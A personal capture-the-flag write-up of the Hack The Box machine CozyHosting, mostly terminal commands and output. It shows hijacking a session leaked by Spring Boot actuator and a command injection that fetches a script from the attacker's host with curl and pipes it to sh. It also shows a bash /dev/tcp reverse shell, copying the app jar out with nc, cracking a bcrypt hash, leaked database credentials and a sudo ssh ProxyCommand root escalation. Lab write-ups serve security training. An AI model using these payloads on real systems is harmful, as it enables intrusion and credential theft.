htb-cozyhosting

HTB-CozyHosting

https://app.hackthebox.com/machines/CozyHosting

──(kwkl㉿kwkl)-[~]
└─$ tail -l /etc/hosts                                                                                                                                                       1 ⨯10.10.11.230 cozyhosting.htb
──(kwkl㉿kwkl)-[~]
└─$ nmap -A 10.10.11.230 -T4 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-23 20:47 HKT
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 7.27% done; ETC: 20:50 (0:02:59 remaining)
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 10.12% done; ETC: 20:50 (0:02:31 remaining)
Nmap scan report for 10.10.11.230 (10.10.11.230)
Host is up (0.61s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
9999/tcp open  abyss?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.99 seconds

image-20230923205309502

┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
└─$ sudo ./fscan_amd64 -h 10.10.11.230   ___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.2
start infoscan
(icmp) Target 10.10.11.230    is alive
[*] Icmp alive hosts len is: 1
10.10.11.230:8000 open
10.10.11.230:22 open
10.10.11.230:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://10.10.11.230       code:301 len:178    title:301 Moved Permanently 跳转url: http://cozyhosting.htb
[*] WebTitle: http://cozyhosting.htb    code:200 len:12706  title:Cozy Hosting - Home
已完成 1/3 [-] ssh 10.10.11.230:22 root 123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
[+] http://cozyhosting.htb poc-yaml-springboot-env-unauth spring2
已完成 2/3 [-] ssh 10.10.11.230:22 root root123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root 123456~a ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 10.10.11.230:22 root sysadmin ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/3
[*] 扫描结束,耗时: 7m6.791807771s
┌──(kwkl㉿kwkl)-[~/tools/scan_tool/dirsearch-0.4.3]
└─$ ./dirsearch.py -u http://cozyhosting.htb/                                                                                                                                1 ⨯_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/kwkl/tools/scan_tool/dirsearch-0.4.3/reports/http_cozyhosting.htb/__23-09-30_10-56-44.txtTarget: http://cozyhosting.htb/[10:56:44] Starting:                                                                                                                                                             
[10:57:32] 200 -    0B  - /;/login                                          
[10:57:32] 200 -    0B  - /;/json
[10:57:32] 200 -    0B  - /;/admin
[10:57:32] 200 -    0B  - /;admin/
[10:57:32] 200 -    0B  - /;login/
[10:57:32] 200 -    0B  - /;json/                                           
[10:57:32] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:57:35] 400 -  435B  - /a%5c.aspx                                        
[10:57:38] 200 -    0B  - /actuator/;/auditevents                           
[10:57:38] 200 -    0B  - /actuator/;/auditLog                              
[10:57:39] 200 -  634B  - /actuator                                         
[10:57:39] 200 -    0B  - /actuator/;/conditions
[10:57:39] 200 -    0B  - /actuator/;/caches
[10:57:39] 200 -    0B  - /actuator/;/configprops
[10:57:39] 200 -    0B  - /actuator/;/beans
[10:57:39] 200 -    0B  - /actuator/;/configurationMetadata
[10:57:39] 200 -    0B  - /actuator/;/dump
[10:57:39] 200 -    0B  - /actuator/;/env
[10:57:39] 200 -    0B  - /actuator/;/features
[10:57:39] 200 -    0B  - /actuator/;/flyway
[10:57:39] 200 -    0B  - /actuator/;/events
[10:57:39] 200 -    0B  - /actuator/;/exportRegisteredServices
[10:57:39] 200 -    0B  - /actuator/;/health
[10:57:39] 200 -    0B  - /actuator/;/heapdump
[10:57:39] 200 -    0B  - /actuator/;/info
[10:57:39] 200 -    0B  - /actuator/;/httptrace
[10:57:39] 200 -    0B  - /actuator/;/healthcheck
[10:57:39] 200 -    0B  - /actuator/;/logfile
[10:57:39] 200 -    0B  - /actuator/;/jolokia
[10:57:39] 200 -    0B  - /actuator/;/loggers
[10:57:39] 200 -    0B  - /actuator/;/loggingConfig
[10:57:39] 200 -    0B  - /actuator/;/prometheus
[10:57:39] 200 -    0B  - /actuator/;/integrationgraph
[10:57:39] 200 -    0B  - /actuator/;/liquibase
[10:57:39] 200 -    0B  - /actuator/;/mappings
[10:57:39] 200 -    0B  - /actuator/;/metrics
[10:57:39] 200 -    0B  - /actuator/;/refresh
[10:57:39] 200 -    0B  - /actuator/;/registeredServices
[10:57:39] 200 -    0B  - /actuator/;/sessions
[10:57:39] 200 -    0B  - /actuator/;/releaseAttributes
[10:57:39] 200 -    0B  - /actuator/;/resolveAttributes
[10:57:39] 200 -    0B  - /actuator/;/ssoSessions
[10:57:39] 200 -    0B  - /actuator/;/sso
[10:57:39] 200 -    0B  - /actuator/;/scheduledtasks
[10:57:39] 200 -    0B  - /actuator/;/shutdown
[10:57:39] 200 -    0B  - /actuator/;/springWebflow
[10:57:39] 200 -    0B  - /actuator/;/statistics
[10:57:39] 200 -    0B  - /actuator/;/status
[10:57:39] 200 -    0B  - /actuator/;/trace
[10:57:39] 200 -    0B  - /actuator/;/threaddump
[10:57:40] 200 -    5KB - /actuator/env                                     
[10:57:40] 200 -   15B  - /actuator/health                                  
[10:57:41] 200 -   10KB - /actuator/mappings                                
[10:57:41] 200 -   98B  - /actuator/sessions                                
[10:57:43] 200 -  124KB - /actuator/beans                                   
[10:57:45] 401 -   97B  - /admin                                            
[10:57:47] 200 -    0B  - /admin/%3bindex/                                  
[10:57:54] 200 -    0B  - /Admin;/                                          
[10:57:54] 200 -    0B  - /admin;/                                          
[10:58:28] 200 -    0B  - /axis//happyaxis.jsp                              
[10:58:28] 200 -    0B  - /axis2-web//HappyAxis.jsp                         
[10:58:28] 200 -    0B  - /axis2//axis2-web/HappyAxis.jsp                   
[10:58:38] 200 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload_f9.swf       
[10:59:02] 200 -    0B  - /engine/classes/swfupload//swfupload.swf
[10:59:02] 500 -   73B  - /error                                            
[10:59:04] 200 -    0B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/ 
[10:59:05] 200 -    0B  - /extjs/resources//charts.swf                      
[10:59:28] 200 -    0B  - /html/js/misc/swfupload//swfupload.swf            
[10:59:35] 200 -    0B  - /jkstatus;                                        
[10:59:40] 200 -    4KB - /login                                            
[10:59:41] 200 -    0B  - /login.wdm%2e                                     
[10:59:42] 204 -    0B  - /logout                                           Task Completed                                                                                                                                                                   

Find. sessions

http://cozyhosting.htb/actuator/sessions

image-20230930110748703

F0FD1F42518BC0B9959B98BED562DC79 “kanderson”

image-20230930111009958

Using this sessionid

image-20230930111619244

we can login in. As kanderson

image-20230930112703766

kanderson%20||%20whoami

;‘id’

image-20230930122338971

http://10.10.16.51:5555/1@1

many times try

 ┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
└─$ cat 1@1      
bash -c "bash -i>& /dev/tcp/10.10.16.51/6666 0>&1"┌──(kwkl㉿kwkl)-[~/tools/scan_tool]
└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.16.51 - - [01/Oct/2023 22:17:55] "GET /1@1 HTTP/1.1" 200 -
10.10.16.51 - - [01/Oct/2023 22:18:04] "GET /1@1 HTTP/1.1" 200 -
10.10.11.230 - - [01/Oct/2023 22:18:52] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:18:52] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:19:59] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:19:59] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:20:42] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:20:42] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:11] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:22:11] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:31] code 404, message File not found
10.10.11.230 - - [01/Oct/2023 22:22:31] "GET /1 HTTP/1.1" 404 -
10.10.11.230 - - [01/Oct/2023 22:22:47] "GET /1@1 HTTP/1.1" 200 -
10.10.11.230 - - [01/Oct/2023 22:35:39] "GET /1@1 HTTP/1.1" 200 -
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

image-20231001230450457

raw head

POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=7BFD184ED7E857BC1FDD473077783C27//
Upgrade-Insecure-Requests: 1host=1&username=;kanderson||curl$IFS$9http://10.10.16.51:5555/1@1|sh%0a
HTTP/1.1 504 Gateway Time-out
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Oct 2023 14:36:38 GMT
Content-Type: text/html
Content-Length: 176
Connection: close<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

nc op!

┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:55596.
bash: cannot set terminal process group (1063): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ idapp@cozyhosting:/app$ id
id
uid=1001(app) gid=1001(app) groups=1001(app)
app@cozyhosting:/app$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ ls -al
ls -al
total 58856
drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar
app@cozyhosting:/app$ nc 10.10.16.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
<6.51/7777/cloudhosting.zip < cloudhosting-0.0.1.jar
nc: missing port number
app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
<6.51 7777 cloudhosting.zip < cloudhosting-0.0.1.jar
nc: port number invalid: cloudhosting.zip
app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc: port number invalid: cloudhosting-0.0.1.jar
app@cozyhosting:/app$ nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc 10.10.16.51 7777 cloudhosting-0.0.1.jar
nc: port number invalid: cloudhosting-0.0.1.jar
app@cozyhosting:/app$ nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar
nc 10.10.16.51 7777 < cloudhosting-0.0.1.jar

recv

┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 7777 > cloudhosting.jar                                                                                                                                       130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:44434.

get the jar ball

                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~]
└─$ cp cloudhosting.jar cloudhosting.zip┌──(kwkl㉿kwkl)-[~]
└─$ mkdir cloud  ┌──(kwkl㉿kwkl)-[~/cloud]
└─$ mv ../cloudhosting.zip ../cloud┌──(kwkl㉿kwkl)-[~/cloud]
└─$ ls
BOOT-INF  cloudhosting.zip  META-INF  org┌──(kwkl㉿kwkl)-[~/cloud]
└─$ ls                                                                                                                                                                       1 ⨯
BOOT-INF  cloudhosting.zip  META-INF  org┌──(kwkl㉿kwkl)-[~/cloud]
└─$ unzip cloudhosting.zip ┌──(kwkl㉿kwkl)-[~/cloud]
└─$ grep "password" ./ -r
grep: ./cloudhosting.zip:匹配到二进制文件
grep: ./BOOT-INF/lib/spring-security-crypto-6.0.1.jar:匹配到二进制文件
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:    <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg:    <glyph glyph-name="lock-password-line"
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf:匹配到二进制文件
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
grep: ./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot:匹配到二进制文件
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:匹配到二进制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUser.class:匹配到二进制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/secutiry/SecurityConfig.class:匹配到二进制文件
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/templates/login.html:                                        <input type="password" name="password" class="form-control" id="yourPassword"
./BOOT-INF/classes/templates/login.html:                                        <div class="invalid-feedback">Please enter your password!</div>
./BOOT-INF/classes/templates/login.html:                                    <p th:if="${param.error}" class="text-center small">Invalid username or password</p>┌──(kwkl㉿kwkl)-[~/cloud]
└─$ grep "username" ./ -r
grep: ./BOOT-INF/classes/htb/cloudhosting/scheduled/FakeUser.class:匹配到二进制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/database/CozyUserDetailsService.class:匹配到二进制文件
grep: ./BOOT-INF/classes/htb/cloudhosting/compliance/ComplianceService.class:匹配到二进制文件
./BOOT-INF/classes/application.properties:spring.datasource.username=postgres
./BOOT-INF/classes/templates/login.html:                                            <input type="text" name="username" class="form-control" id="yourUsername"
./BOOT-INF/classes/templates/login.html:                                            <div class="invalid-feedback">Please enter your username.</div>
./BOOT-INF/classes/templates/login.html:                                    <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
./BOOT-INF/classes/templates/admin.html:                                        <input name="username" class="form-control" id="username" placeholder="user">
./BOOT-INF/classes/templates/admin.html:                                        <label for="username">Username</label>┌──(kwkl㉿kwkl)-[~/cloud]
└─$ 

get the postgresql some info

./BOOT-INF/classes/application.properties:spring.datasource.username=postgres

./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR

using jd-gui

image-20231002110424109

server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

image-20231002110833894

package BOOT-INF.classes.htb.cloudhosting.scheduled;

import java.io.IOException;
import java.util.concurrent.TimeUnit;
import org.springframework.scheduling.annotation.Scheduled;
import org.springframework.stereotype.Component;

@Component
public class FakeUser {
@Scheduled(timeUnit = TimeUnit.MINUTES, fixedDelay = 5L)
public void login() throws IOException {
System.out.println(“Logging in user …”);
Runtime.getRuntime().exec(new String[] { “curl”, “localhost:8080/login”, “–request”, “POST”, “–header”, “Content-Type: application/x-www-form-urlencoded”, “–data-raw”, “username=kanderson&password=MRdEQuv6~6P9”, “-v” });
}
}

Conn postgresql!

                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666                                                                                                                                                          130 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.11.230.
Ncat: Connection from 10.10.11.230:46842.
bash: cannot set terminal process group (1064): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
app@cozyhosting:/app$ ls
ls
cloudhosting-0.0.1.jar
app@cozyhosting:/app$ psql -h localhost -p 5432 -U postgres -d cozyhosting
psql -h localhost -p 5432 -U postgres -d cozyhosting
Password for user postgres: Vg&nvzAQ7XxRpsql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.cozyhosting=# ls
ls
cozyhosting-# help
help
Use \? for help or press control-C to clear the input buffer.
cozyhosting-# \?
\?
WARNING: terminal is not fully functional
Press RETURN to continue  General\copyright             show PostgreSQL usage and distribution terms\crosstabview [COLUMNS] execute query and display results in crosstab\errverbose            show most recent error message at maximum verbosity\g [(OPTIONS)] [FILE]  execute query (and send results to file or |pipe);\g with no arguments is equivalent to a semicolon\gdesc                 describe result of query, without executing it\gexec                 execute query, then execute each value in its result\gset [PREFIX]         execute query and store results in psql variables\gx [(OPTIONS)] [FILE] as \g, but forces expanded output mode\q                     quit psql\watch [SEC]           execute query every SEC secondsHelp\? [commands]          show help on backslash commands\? options             show help on psql command-line options\? variables           show help on special variables\h [NAME]              help on syntax of SQL commands, * for all commandsQuery Buffer\e [FILE] [LINE]       edit the query buffer (or file) with external editor\ef [FUNCNAME [LINE]]  edit function definition with external editor\ev [VIEWNAME [LINE]]  edit view definition with external editor
:\p                     show the contents of the query buffer
:\r                     reset (clear) the query buffer
:\s [FILE]              display history or save it to file
:\w FILE                write query buffer to file
:
:Input/Output
:\copy ...              perform SQL COPY with data stream to the client host\echo [-n] [STRING]    write string to standard output (-n for no newline)\i FILE                execute commands from file\ir FILE               as \i, but relative to location of current script\o [FILE]              send all query results to file or |pipe\qecho [-n] [STRING]   write string to \o output stream (-n for no newline)\warn [-n] [STRING]    write string to standard error (-n for no newline)
:
Conditional\if EXPR               begin conditional block\elif EXPR             alternative within current conditional block\else                  final alternative within current conditional block\endif                 end conditional block
::Informational(options: S = show system objects, + = additional detail)
:\d[S+]                 list tables, views, and sequences\d[S+]  NAME           describe table, view, sequence, or index
:\da[S]  [PATTERN]      list aggregates
:\dA[+]  [PATTERN]      list access methods
:\dAc[+] [AMPTRN [TYPEPTRN]]  list operator classes\dAf[+] [AMPTRN [TYPEPTRN]]  list operator families
:\dAo[+] [AMPTRN [OPFPTRN]]   list operators of operator families
:\dAp[+] [AMPTRN [OPFPTRN]]   list support functions of operator families
:\db[+]  [PATTERN]      list tablespaces\dc[S+] [PATTERN]      list conversions
:\dC[+]  [PATTERN]      list casts
:\dd[S]  [PATTERN]      show object descriptions not displayed elsewhere\dD[S+] [PATTERN]      list domains
:\ddp    [PATTERN]      list default privileges
:\dE[S+] [PATTERN]      list foreign tables\des[+] [PATTERN]      list foreign servers
:\det[+] [PATTERN]      list foreign tables\deu[+] [PATTERN]      list user mappings
:\dew[+] [PATTERN]      list foreign-data wrappers
:\df[anptw][S+] [FUNCPTRN [TYPEPTRN ...]]list [only agg/normal/procedure/trigger/window] functio
ns\dF[+]  [PATTERN]      list text search configurations\dFd[+] [PATTERN]      list text search dictionaries\dFp[+] [PATTERN]      list text search parsers\dFt[+] [PATTERN]      list text search templates\dg[S+] [PATTERN]      list roles\di[S+] [PATTERN]      list indexes\dl                    list large objects, same as \lo_list
:quit
cozyhosting-# quit
Use \q to quit.
cozyhosting-# dt
dt
cozyhosting-# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue List of relationsSchema | Name  | Type  |  Owner   
--------+-------+-------+----------public | hosts | table | postgrespublic | users | table | postgres
(2 rows)(END)
(END)q
cozyhosting-# 
cozyhosting-# select * from users;
select * from users;
ERROR:  syntax error at or near "ls"
LINE 1: ls^
cozyhosting=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue name    |                           password                           | role-----------+--------------------------------------------------------------+-----
--kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | Useradmin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
n
(2 rows)(END)

┌──(kwkl㉿kwkl)-[~]
└─$ john hash2 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 12 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status

manchesterunited (?)

1g 0:00:00:11 DONE (2023-10-02 11:27) 0.08756g/s 245.8p/s 245.8c/s 245.8C/s 159159…keyboard
Use the “–show” option to display all of the cracked passwords reliably
Session completed.

┌──(kwkl㉿kwkl)-[~]
└─$ vim hash2           ┌──(kwkl㉿kwkl)-[~]
└─$ john hash2 -w=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)     
1g 0:00:00:11 DONE (2023-10-02 11:27) 0.08756g/s 245.8p/s 245.8c/s 245.8C/s 159159..keyboard
Use the "--show" option to display all of the cracked passwords reliably
Session completed. ┌──(kwkl㉿kwkl)-[~]
└─$ cat hash2                     
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm ┌──(kwkl㉿kwkl)-[~]
└─$ app@cozyhosting:/app$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001::/home/app:/bin/sh
postgres:x:114:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
josh:x:1003:1003::/home/josh:/usr/bin/bash
_laurel:x:998:998::/var/log/laurel:/bin/false
app@cozyhosting:/app$ 

User flag:

633400af01adcc71fd0a9174a813847c

┌──(kwkl㉿kwkl)-[~]
└─$ ssh josh@10.10.11.230     
The authenticity of host '10.10.11.230 (10.10.11.230)' can't be established.
ECDSA key fingerprint is SHA256:dHlbSOhuGjzTNgvvNbEe2LXI3SsauTGXC/Y5kWTJKs4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.230' (ECDSA) to the list of known hosts.
josh@10.10.11.230's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information as of Mon Oct  2 03:32:14 AM UTC 2023System load:           0.0Usage of /:            53.2% of 5.42GBMemory usage:          13%Swap usage:            0%Processes:             239Users logged in:       0IPv4 address for eth0: 10.10.11.230IPv6 address for eth0: dead:beef::250:56ff:feb9:63e0Expanded Security Maintenance for Applications is not enabled.0 updates can be applied immediately.Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro statusThe list of available updates is more than a week old.
To check for new updates run: sudo apt updateLast login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$ ls
user.txt
josh@cozyhosting:~$ id
uid=1003(josh) gid=1003(josh) groups=1003(josh)
josh@cozyhosting:~$ cat user.txt
633400af01adcc71fd0a9174a813847c
josh@cozyhosting:~$ josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Sorry, try again.
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser josh may run the following commands on localhost:(root) /usr/bin/ssh *
josh@cozyhosting:~$ josh@cozyhosting:~$ sudo -l
[sudo] password for josh: 
Sorry, try again.
[sudo] password for josh: 
Matching Defaults entries for josh on localhost:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser josh may run the following commands on localhost:(root) /usr/bin/ssh *
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# 
# 
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
f1714bfee126c2c7107a6ae26fb22b7d
# 

Root flag:f1714bfee126c2c7107a6ae26fb22b7d

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/96675.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

c#访问sql server数据库登录失败

以下配置适用于如下情况&#xff1a;已经能连接数据库的server&#xff0c;而且用户名、密码都对&#xff0c;但通过c#访问数据库时出错&#xff0c;提示login、管道相关的错误。通过一些配置&#xff0c;最终解决了该问题&#xff0c;遇到该问题的小伙伴也可以按照同样配置尝试…

【轻松玩转MacOS】基本操作篇

